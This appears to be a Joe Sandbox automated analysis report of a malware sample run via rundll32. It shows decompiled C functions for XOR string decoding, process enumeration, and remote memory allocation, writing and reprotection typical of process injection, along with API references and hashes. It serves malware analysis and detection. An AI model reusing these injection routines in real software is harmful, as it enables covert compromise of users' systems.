                                                                      • Opcode Fuzzy Hash: 995d246d4799b7bc36d15e70902fcae852dfd750e6bdff3d776462bd15d49d94
                                                                      • Instruction Fuzzy Hash: 73414A72A44219EFDB10CF94D989EEEBBB9FB48350F004579E508E7250E735AA44CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 169 4941015-4941025 170 4941139-494113d 169->170 171 494102b-4941066 call 494910a call 49494e5 call 4954357 call 49490ea GetFileAttributesW 169->171 172 4941132 170->172 173 494113f-494114f 170->173 185 4941076-4941082 call 4949d66 171->185 186 4941068-494106e call 4949d66 171->186 175 4941134-4941136 172->175 179 494106f-4941071 173->179 179->175 191 4941084-49410e3 memset * 2 MultiByteToWideChar 185->191 186->179 191->191 192 49410e5-494110f call 4949491 GetPEB 191->192 195 4941130-4941131 192->195 196 4941111-4941113 192->196 195->172 197 4941118-4941122 196->197 197->197 198 4941124-494112e 197->198 198->195 198->198
                                                                      C-Code - Quality: 93%
                                                                      			_entry_(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                      				void _v257;
                                                                      				char _v258;
                                                                      				char _v260;
                                                                      				short _v772;
                                                                      				intOrPtr _t21;
                                                                      				WCHAR* _t28;
                                                                      				long _t29;
                                                                      				char _t32;
                                                                      				char _t33;
                                                                      				int _t44;
                                                                      				void* _t48;
                                                                      				void* _t58;
                                                                      				int _t61;
                                                                      				intOrPtr* _t63;
                                                                      
                                                                      				_t48 = __ecx;
                                                                      				if(_a8 != 1) {
                                                                      					if(_a8 != 0) {
                                                                      						L11:
                                                                      						return 1;
                                                                      					}
                                                                      					_t21 =  *0x4960fa0; // 0x49ff8a0
                                                                      					 *((intOrPtr*)(_t21 + 0xbc))(0xaa);
                                                                      					L3:
                                                                      					return 0;
                                                                      				}
                                                                      				E0494910A();
                                                                      				E049494E5();
                                                                      				 *0x4960fa8 = _a4;
                                                                      				 *0x4960fa4 = 1;
                                                                      				E04954357(_a4);
                                                                      				 *_t63 = 0x14c; // executed
                                                                      				_t28 = E049490EA(_t48); // executed
                                                                      				_a8 = _t28;
                                                                      				_t29 = GetFileAttributesW(_t28); // executed
                                                                      				if(_t29 == 0xffffffff) {
                                                                      					E04949D66( &_a8);
                                                                      					_t58 = 0x14;
                                                                      					_t61 = 0;
                                                                      					do {
                                                                      						_t32 =  *0x495d868; // 0x6665
                                                                      						_v260 = _t32;
                                                                      						_t33 =  *0x495d86a; // 0x0
                                                                      						_v258 = _t33;
                                                                      						memset( &_v257, 0, 0xfd);
                                                                      						memset( &_v772, 0, 0x200);
                                                                      						_t63 = _t63 + 0x18;
                                                                      						MultiByteToWideChar(0, 0,  &_v260, 0xffffffff,  &_v772, 0xff);
                                                                      						_t58 = _t58 - 1;
                                                                      					} while (_t58 != 0);
                                                                      					 *0x4960fa0 = E04949491(0x144, 0x26e);
                                                                      					_a8 =  *[fs:0x30];
                                                                      					if(_a8[1] == 0) {
                                                                      						L10:
                                                                      						goto L11;
                                                                      					}
                                                                      					_t44 = 0;
                                                                      					do {
                                                                      						 *(_t44 + 0x495f820) =  *(_t44 + 0x495f820) ^ 0x00000009;
                                                                      						_t44 = _t44 + 1;
                                                                      					} while (_t44 < 0x80);
                                                                      					do {
                                                                      						 *(_t61 + 0x495f050) =  *(_t61 + 0x495f050) ^ 0x000000aa;
                                                                      						_t61 = _t61 + 1;
                                                                      					} while (_t61 < 0x80);
                                                                      					goto L10;
                                                                      				}
                                                                      				E04949D66( &_a8);
                                                                      				goto L3;
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 0494910A: HeapCreate.KERNELBASE(00000000,00096000,00000000,04941030), ref: 04949113
                                                                      • GetFileAttributesW.KERNELBASE(00000000), ref: 0494105A
                                                                      • memset.MSVCRT ref: 049410A9
                                                                      • memset.MSVCRT ref: 049410BB
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 049410DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: memset$AttributesByteCharCreateFileHeapMultiWide
                                                                      • String ID:
                                                                      • API String ID: 371002992-0
                                                                      • Opcode ID: a990b7d48b967e5304234dd068e489c7743b8ff50a51d3704304198bcbaa399f
                                                                      • Instruction ID: 7b5528f8896bebea3c2e9409b4086af109a0f2f6b30cf706823d563b6c406549
                                                                      • Opcode Fuzzy Hash: a990b7d48b967e5304234dd068e489c7743b8ff50a51d3704304198bcbaa399f
                                                                      • Instruction Fuzzy Hash: 4831F571504354AFE720EF78DC49F9A7BACEB89324F10817AE559CB181D774A981CB20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 199 494ca0f-494ca42 NtAllocateVirtualMemory 200 494ca44-494ca55 NtWriteVirtualMemory 199->200 201 494ca8d 199->201 202 494ca76-494ca7a 200->202 203 494ca57-494ca6f NtProtectVirtualMemory 200->203 204 494ca8f-494ca93 201->204 202->201 206 494ca7c-494ca8a NtFreeVirtualMemory 202->206 203->202 205 494ca71-494ca74 203->205 205->204 206->201
                                                                      C-Code - Quality: 100%
                                                                      			E0494CA0F(void* __ecx, void* __edx, void* _a4, long _a8, long _a12) {
                                                                      				void* _v8;
                                                                      				long _v12;
                                                                      				long _v16;
                                                                      				long _t25;
                                                                      				long _t37;
                                                                      				void* _t41;
                                                                      				void* _t42;
                                                                      
                                                                      				_t37 = _a8;
                                                                      				_t41 = __ecx;
                                                                      				_a8 = _t37;
                                                                      				_t42 = __edx;
                                                                      				_v8 = 0;
                                                                      				_v16 = 0;
                                                                      				_v12 = 0;
                                                                      				_t25 = NtAllocateVirtualMemory(__edx,  &_v8, 0,  &_a8, 0x3000, 4); // executed
                                                                      				if(_t25 < 0) {
                                                                      					L6:
                                                                      					return 0;
                                                                      				}
                                                                      				if(NtWriteVirtualMemory(_t42, _v8, _a4, _t37,  &_v12) < 0) {
                                                                      					L4:
                                                                      					if(_v8 != 0) {
                                                                      						 *((intOrPtr*)(_t41 + 4))(_t42,  &_v8,  &_a8, 0x8000);
                                                                      					}
                                                                      					goto L6;
                                                                      				}
                                                                      				_a8 = _t37;
                                                                      				if(NtProtectVirtualMemory(_t42,  &_v8,  &_a8, _a12,  &_v16) < 0) {
                                                                      					goto L4;
                                                                      				}
                                                                      				return _v8;
                                                                      			}










                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 0494CA3E
                                                                      • NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 0494CA50
                                                                      • NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 0494CA6A
                                                                      • NtFreeVirtualMemory.NTDLL(?,00000000,00000000,00008000), ref: 0494CA8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryVirtual$AllocateFreeProtectWrite
                                                                      • String ID:
                                                                      • API String ID: 727285278-0
                                                                      • Opcode ID: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
                                                                      • Instruction ID: ff7dde54b40ca65cbc6c5bc550a0dec06cf0d73bbc9c3a1b02d2311a1babb489
                                                                      • Opcode Fuzzy Hash: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
                                                                      • Instruction Fuzzy Hash: 4811E3B6A0110DBFDB15DF95C944EDEBBBCEF48354F10806ABA19E6140E730EB049BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E049543F4(signed int __eax, void* _a4, void* _a8, intOrPtr _a12, void* _a16) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				intOrPtr _v20;
                                                                      				long _v24;
                                                                      				long _v28;
                                                                      				intOrPtr _v32;
                                                                      				long _v36;
                                                                      				intOrPtr _v40;
                                                                      				long _v44;
                                                                      				void* _v48;
                                                                      				intOrPtr _v52;
                                                                      				signed int _v56;
                                                                      				void* _v60;
                                                                      				signed int _v64;
                                                                      				char _v76;
                                                                      				void* _t180;
                                                                      				void* _t181;
                                                                      
                                                                      				_v64 = _v64 & 0x00000000;
                                                                      				if(_a12 == 0) {
                                                                      					return __eax | 0xffffffff;
                                                                      				}
                                                                      				_v32 = _a12;
                                                                      				_v40 =  *((intOrPtr*)(_a12 + 0x3c)) + _a12;
                                                                      				_v52 = _v40;
                                                                      				_t16 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8; // 0xf8
                                                                      				_v20 = _a12 + _t16;
                                                                      				_v36 = _v36 & 0x00000000;
                                                                      				do {
                                                                      				} while (0 != 0);
                                                                      				_v44 = 4;
                                                                      				_v24 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8;
                                                                      				_v48 = _a16;
                                                                      				_v28 = NtProtectVirtualMemory(_a8,  &_v48,  &_v24, _v44,  &_v36);
                                                                      				if(_v28 >= 0) {
                                                                      					_v12 = _v12 & 0x00000000;
                                                                      					while(_v12 < ( *(_v52 + 6) & 0x0000ffff)) {
                                                                      						if( *((intOrPtr*)(_v20 + 0x14 + _v12 * 0x28)) != 0) {
                                                                      							E049492A2( &_v76, 0, 9);
                                                                      							E04949202( &_v76, _v12 * 0x28 + _v20, 8);
                                                                      							_t181 = _t181 + 0x18;
                                                                      							_v60 = _a16 +  *((intOrPtr*)(_v20 + 0xc + _v12 * 0x28));
                                                                      							_v8 = _v8 & 0x00000000;
                                                                      							_v56 =  *(_v20 + 0x24 + _v12 * 0x28) & 0xf0000000;
                                                                      							_v16 = _v56;
                                                                      							if(_v16 == 0x20000000) {
                                                                      								_v8 = 0x10;
                                                                      							} else {
                                                                      								if(_v16 == 0x40000000) {
                                                                      									_v8 = 2;
                                                                      									if( *((char*)(_t180 + 0xbadb65)) == 0x72 &&  *((char*)(_t180 + 0xbadb65)) == 0x64 &&  *((char*)(_t180 + 0xffffffffffffffbb)) == 0x61 &&  *((char*)(_t180 + 0xbadb65)) == 0x74 &&  *((char*)(_t180 + 0xffffffffffffffbd)) == 0x61) {
                                                                      										_v8 = 4;
                                                                      									}
                                                                      								} else {
                                                                      									if(_v16 == 0x60000000) {
                                                                      										_v8 = 0x20;
                                                                      									} else {
                                                                      										if(_v16 == 0x80000000) {
                                                                      											_v8 = 4;
                                                                      										} else {
                                                                      											if(_v16 == 0xa0000000) {
                                                                      												_v8 = 0x40;
                                                                      											} else {
                                                                      												if(_v16 == 0xc0000000) {
                                                                      													_v8 = 4;
                                                                      												} else {
                                                                      													if(_v16 == 0xe0000000) {
                                                                      														_v8 = 0x40;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							while(0 != 0) {
                                                                      							}
                                                                      							_v24 =  *((intOrPtr*)(_v20 + 0x10 + _v12 * 0x28));
                                                                      							_v28 = NtProtectVirtualMemory(_a8,  &_v60,  &_v24, _v8,  &_v36);
                                                                      							if(_v28 >= 0) {
                                                                      								while(0 != 0) {
                                                                      								}
                                                                      								L43:
                                                                      								L10:
                                                                      								_v12 = _v12 + 1;
                                                                      								continue;
                                                                      							}
                                                                      							while(0 != 0) {
                                                                      							}
                                                                      							goto L43;
                                                                      						}
                                                                      						goto L10;
                                                                      					}
                                                                      					return 0;
                                                                      				}
                                                                      				L6:
                                                                      				if(0 == 0) {
                                                                      					return 0xffffffff;
                                                                      				} else {
                                                                      				}
                                                                      				goto L6;
                                                                      			}





















                                                                      APIs
                                                                      • NtProtectVirtualMemory.NTDLL(049443D8,?,?,00000004,00000000), ref: 04954471
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProtectVirtual
                                                                      • String ID: @
                                                                      • API String ID: 2706961497-2766056989
                                                                      • Opcode ID: 5d6acb65a0b66dfe4f450ea08b61fb6c7ae1f8b855b602cec30e187115862d90
                                                                      • Instruction ID: 8471b3f3f17ccac32bced7fe31a5186a830fc9fe5665beadfb2ae7974defd6de
                                                                      • Opcode Fuzzy Hash: 5d6acb65a0b66dfe4f450ea08b61fb6c7ae1f8b855b602cec30e187115862d90
                                                                      • Instruction Fuzzy Hash: 9C711AB0900249DFDF90CFA4C585BEDBBF9AB04309F208576D811E62A0E774EA96DF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E0494C71C(void* __ecx, void* __edx) {
                                                                      				void* _v304;
                                                                      				char _v308;
                                                                      				intOrPtr _v312;
                                                                      				char _v316;
                                                                      				signed int _t20;
                                                                      				signed int _t21;
                                                                      				char _t27;
                                                                      				intOrPtr _t37;
                                                                      				void* _t40;
                                                                      				intOrPtr _t49;
                                                                      				void* _t51;
                                                                      				void* _t55;
                                                                      				void* _t57;
                                                                      
                                                                      				_t40 = __edx;
                                                                      				_v304 = __ecx;
                                                                      				_t20 = CreateToolhelp32Snapshot(2, 0);
                                                                      				_t57 = _t20;
                                                                      				_t21 = _t20 | 0xffffffff;
                                                                      				if(_t57 != _t21) {
                                                                      					E049492A2( &_v304, 0, 0x128);
                                                                      					_v304 = 0x128;
                                                                      					if(Process32First(_t57,  &_v304) != 0) {
                                                                      						_t27 = E0494911F(0x20);
                                                                      						_v316 = _t27;
                                                                      						_t51 = 0x1f;
                                                                      						do {
                                                                      							_t9 = _t51 + 0x63; // 0x82
                                                                      							 *((char*)(_t51 + _t27)) = _t9;
                                                                      							_t51 = _t51 - 1;
                                                                      						} while (_t51 >= 0);
                                                                      						E0494913B( &_v316, 0);
                                                                      						while(1) {
                                                                      							_t55 = _v312( &_v308, _t40);
                                                                      							if(_t55 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t49 =  *0x4960fa0; // 0x49ff8a0
                                                                      							_push( &_v308);
                                                                      							_push(_t57);
                                                                      							if( *((intOrPtr*)(_t49 + 0x48))() != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						FindCloseChangeNotification(_t57);
                                                                      						_t21 = 0 | _t55 == 0x00000000;
                                                                      					} else {
                                                                      						_t37 =  *0x4960fa0; // 0x49ff8a0
                                                                      						 *((intOrPtr*)(_t37 + 0x34))(_t57);
                                                                      						_t21 = 0xfffffffe;
                                                                      					}
                                                                      				}
                                                                      				return _t21;
                                                                      			}


                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000019,?,00000018), ref: 0494C73A
                                                                        • Part of subcall function 049492A2: memset.MSVCRT ref: 049492B4
                                                                      • Process32First.KERNEL32(00000000,?), ref: 0494C76E
                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0494C7D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
                                                                      • String ID:
                                                                      • API String ID: 3344077921-0
                                                                      • Opcode ID: d463c10afd01cc325e1815e3a28ec3940a621ba3fa2a203be9275f86b6328a97
                                                                      • Instruction ID: c6ac3af2663918f34500259e146cf1f0113371053449d1f06ea9043260cb5c1a
                                                                      • Opcode Fuzzy Hash: d463c10afd01cc325e1815e3a28ec3940a621ba3fa2a203be9275f86b6328a97
                                                                      • Instruction Fuzzy Hash: 5721C1736092019FD310DE68E889EAA7BA8EFC9360F15053EF650CB181EB60E905C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E0494A412(void* __ecx, void* __edx) {
                                                                      				void* _v8;
                                                                      				void* _v12;
                                                                      				long _v16;
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v28;
                                                                      				long _v32;
                                                                      				long _t37;
                                                                      				void* _t38;
                                                                      				intOrPtr _t39;
                                                                      				intOrPtr _t42;
                                                                      				intOrPtr _t43;
                                                                      				void* _t46;
                                                                      				void* _t58;
                                                                      				void* _t71;
                                                                      				intOrPtr* _t73;
                                                                      
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_t71 = __edx;
                                                                      				_t58 = __ecx;
                                                                      				_t3 = _t71 + 0x3c; // 0x100
                                                                      				_t73 =  *_t3 + __edx;
                                                                      				if( *_t73 != 0x4550) {
                                                                      					L5:
                                                                      					return 0;
                                                                      				}
                                                                      				_v16 =  *(_t73 + 0x50);
                                                                      				_t37 = NtAllocateVirtualMemory(__ecx,  &_v8, 0,  &_v16, 0x3000, 0x40); // executed
                                                                      				if(_t37 < 0) {
                                                                      					goto L5;
                                                                      				}
                                                                      				_t38 = E0494918A( *0x4960fd8, 0x1ac4);
                                                                      				_v12 = _t38;
                                                                      				if(_t38 == 0) {
                                                                      					goto L5;
                                                                      				}
                                                                      				 *((intOrPtr*)(_t38 + 0x224)) = _v8;
                                                                      				_t39 = E0494CA0F( *0x49610b0, _t58, _t38, 0x1ac4, 4); // executed
                                                                      				_v20 = _t39;
                                                                      				_push(0x1ac4);
                                                                      				_push( &_v12);
                                                                      				if(_t39 != 0) {
                                                                      					E0494913B();
                                                                      					_t42 =  *0x4960fa8; // 0x4940000
                                                                      					_v24 = _t42;
                                                                      					_t43 =  *0x4960fd8; // 0x49ffc50
                                                                      					_v28 = _t43;
                                                                      					 *0x4960fa8 = _v8;
                                                                      					 *0x4960fd8 = _v20;
                                                                      					_t46 = E0494918A(_t71,  *(_t73 + 0x50)); // executed
                                                                      					_v12 = _t46;
                                                                      					if(_t46 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					E0494A391(_t46, _v8, _t71);
                                                                      					_v32 = _v32 & 0x00000000;
                                                                      					 *0x4960fa8 = _v24;
                                                                      					 *0x4960fd8 = _v28;
                                                                      					if(NtWriteVirtualMemory(_t58, _v8, _v12,  *(_t73 + 0x50),  &_v32) < 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					E049543F4(_t52,  *0x49610b0, _t58, _t71, _v8); // executed
                                                                      					E0494913B( &_v12, 0);
                                                                      					return _v8;
                                                                      				}
                                                                      				E0494913B();
                                                                      				goto L5;
                                                                      			}


                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(049443D8,00000000,00000000,?,00003000,00000040,?,00000000,049443D8), ref: 0494A44D
                                                                      • NtWriteVirtualMemory.NTDLL(049443D8,00000000,?,?,00000000), ref: 0494A516
                                                                        • Part of subcall function 0494CA0F: NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 0494CA3E
                                                                        • Part of subcall function 0494CA0F: NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 0494CA50
                                                                        • Part of subcall function 0494CA0F: NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 0494CA6A
                                                                        • Part of subcall function 0494913B: HeapFree.KERNEL32(00000000,00000000), ref: 04949181
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryVirtual$AllocateWrite$FreeHeapProtect
                                                                      • String ID:
                                                                      • API String ID: 4171237596-0
                                                                      • Opcode ID: 6bc7506ba279e34345f7ef5a65d7d75cf688c21a443529c76c966efe94b824e7
                                                                      • Instruction ID: ddfb2458d3c87a6fa53ee800a38ca8efa121b8a5fcdbcc4ac992f8f4e13dd7a2
                                                                      • Opcode Fuzzy Hash: 6bc7506ba279e34345f7ef5a65d7d75cf688c21a443529c76c966efe94b824e7
                                                                      • Instruction Fuzzy Hash: AC4119B1A44209FFEB00DFA4D985EAEBBF8EB88314F104179E500E7280E775AE419B54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph
                                                                      [Control-flow graph of function 0494A664; legend: Executed / Not Executed]
                                                                      C-Code - Quality: 100%
                                                                      			E0494A664(WCHAR* __edx) {
                                                                      				signed int _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				WCHAR* _v24;
                                                                      				char _v28;
                                                                      				char _v29;
                                                                      				intOrPtr _v40;
                                                                      				short _v44;
                                                                      				void* __ebx;
                                                                      				signed int _t48;
                                                                      				signed int _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed int _t62;
                                                                      				intOrPtr _t64;
                                                                      				intOrPtr _t65;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t69;
                                                                      				signed int _t71;
                                                                      				signed int _t72;
                                                                      				signed int _t74;
                                                                      				char _t80;
                                                                      				char _t94;
                                                                      				signed int _t96;
                                                                      				char _t97;
                                                                      				signed int _t98;
                                                                      				signed int _t99;
                                                                      				signed int _t100;
                                                                      				void* _t102;
                                                                      				void* _t103;
                                                                      
                                                                      				_t95 = __edx;
                                                                      				_t80 = 0;
                                                                      				_v24 = __edx;
                                                                      				_v20 = 0;
                                                                      				_v8 = 0;
                                                                      				_t48 = E0494CE25("endless");
                                                                      				_t96 = _t48;
                                                                      				_v29 = 0;
                                                                      				_t98 = 0xf;
                                                                      				if(_t96 <= _t98) {
                                                                      					__eflags = _t96;
                                                                      					if(_t96 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					goto L3;
                                                                      				} else {
                                                                      					_t96 = _t98;
                                                                      					L3:
                                                                      					_t94 = _t80;
                                                                      					do {
                                                                      						_t5 = _t94 + 0x41; // 0x41
                                                                      						 *((char*)(_t102 + _t94 - 0x28)) = _t5;
                                                                      						_t94 = _t94 + 1;
                                                                      					} while (_t94 < _t96);
                                                                      					L5:
                                                                      					lstrlenW( &_v44);
                                                                      					_t97 = E0494A543( &_v20);
                                                                      					_v28 = _t97;
                                                                      					if(_t97 != 0) {
                                                                      						_t99 = _v20;
                                                                      						_v16 = _t80;
                                                                      						__eflags = _t99;
                                                                      						if(_t99 == 0) {
                                                                      							L27:
                                                                      							E0494913B( &_v28, _t80);
                                                                      							return _v8;
                                                                      						} else {
                                                                      							goto L11;
                                                                      						}
                                                                      						while(1) {
                                                                      							L11:
                                                                      							__eflags = _v8 - _t80;
                                                                      							if(_v8 != _t80) {
                                                                      								break;
                                                                      							}
                                                                      							_t100 = _v8;
                                                                      							_v12 = 1;
                                                                      							do {
                                                                      								__eflags = _t100;
                                                                      								if(_t100 != 0) {
                                                                      									break;
                                                                      								}
                                                                      								E049492A2( &_v44, _t80, 0x10);
                                                                      								_t60 =  *0x4960fd8; // 0x49ffc50
                                                                      								_t103 = _t103 + 0xc;
                                                                      								__eflags =  *(_t60 + 0x1898) & 0x00000200;
                                                                      								if(__eflags != 0) {
                                                                      									E0494E15A(_t80, _t95, __eflags);
                                                                      								}
                                                                      								_t95 =  &_v44;
                                                                      								_t62 = E0494CA94( *((intOrPtr*)(_t97 + _v16 * 4)),  &_v44); // executed
                                                                      								__eflags = _t62;
                                                                      								if(_t62 >= 0) {
                                                                      									_t95 =  &_v44;
                                                                      									_t71 = E0494A823(0x49413b8,  &_v44, _v24, _v12); // executed
                                                                      									__eflags = _t71;
                                                                      									if(__eflags != 0) {
                                                                      										_t72 = E0494A952( &_v44, __eflags); // executed
                                                                      										__eflags = _t72;
                                                                      										if(_t72 != 0) {
                                                                      											_t100 = 1;
                                                                      											__eflags = 1;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								__eflags = _v44 - _t80;
                                                                      								if(_v44 != _t80) {
                                                                      									__eflags = _t100;
                                                                      									if(_t100 == 0) {
                                                                      										_t69 =  *0x4960fa0; // 0x49ff8a0
                                                                      										 *((intOrPtr*)(_t69 + 0x114))(_v44, _t80);
                                                                      									}
                                                                      									_t65 =  *0x4960fa0; // 0x49ff8a0
                                                                      									 *((intOrPtr*)(_t65 + 0x34))(_v40);
                                                                      									_t67 =  *0x4960fa0; // 0x49ff8a0
                                                                      									 *((intOrPtr*)(_t67 + 0x34))(_v44);
                                                                      								}
                                                                      								_t64 = _v12 + 1;
                                                                      								_v12 = _t64;
                                                                      								__eflags = _t64 - 2;
                                                                      							} while (_t64 <= 2);
                                                                      							_t57 = _v16 + 1;
                                                                      							_v8 = _t100;
                                                                      							_t99 = _v20;
                                                                      							_v16 = _t57;
                                                                      							__eflags = _t57 - _t99;
                                                                      							if(_t57 < _t99) {
                                                                      								continue;
                                                                      							} else {
                                                                      								break;
                                                                      							}
                                                                      							do {
                                                                      								goto L26;
                                                                      							} while (_t99 != 0);
                                                                      							goto L27;
                                                                      						}
                                                                      						L26:
                                                                      						E0494913B(_t97, 0xfffffffe);
                                                                      						_t97 = _t97 + 4;
                                                                      						_t99 = _t99 - 1;
                                                                      						__eflags = _t99;
                                                                      					}
                                                                      					_t74 = E0494CE25("appear");
                                                                      					_v29 = _t80;
                                                                      					if(_t74 > _t98) {
                                                                      						do {
                                                                      							L8:
                                                                      							_t12 = _t80 + 0x41; // 0x41
                                                                      							 *((char*)(_t102 + _t80 - 0x28)) = _t12;
                                                                      							_t80 = _t80 + 1;
                                                                      						} while (_t80 < _t98);
                                                                      						L9:
                                                                      						lstrlenW( &_v44);
                                                                      						return 0;
                                                                      					}
                                                                      					_t98 = _t74;
                                                                      					if(_t98 == 0) {
                                                                      						goto L9;
                                                                      					}
                                                                      					goto L8;
                                                                      				}
                                                                      			}


































                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 0494A6A9
                                                                      • lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 0494A6E8
                                                                        • Part of subcall function 049492A2: memset.MSVCRT ref: 049492B4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$memset
                                                                      • String ID: appear$endless
                                                                      • API String ID: 3887242890-2536025861
